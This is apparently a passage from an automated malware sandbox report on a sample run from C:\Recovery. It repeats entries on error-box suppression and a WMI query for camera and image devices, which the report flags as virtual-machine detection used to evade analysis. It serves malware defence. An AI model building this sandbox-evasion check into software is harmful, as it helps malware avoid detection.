                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
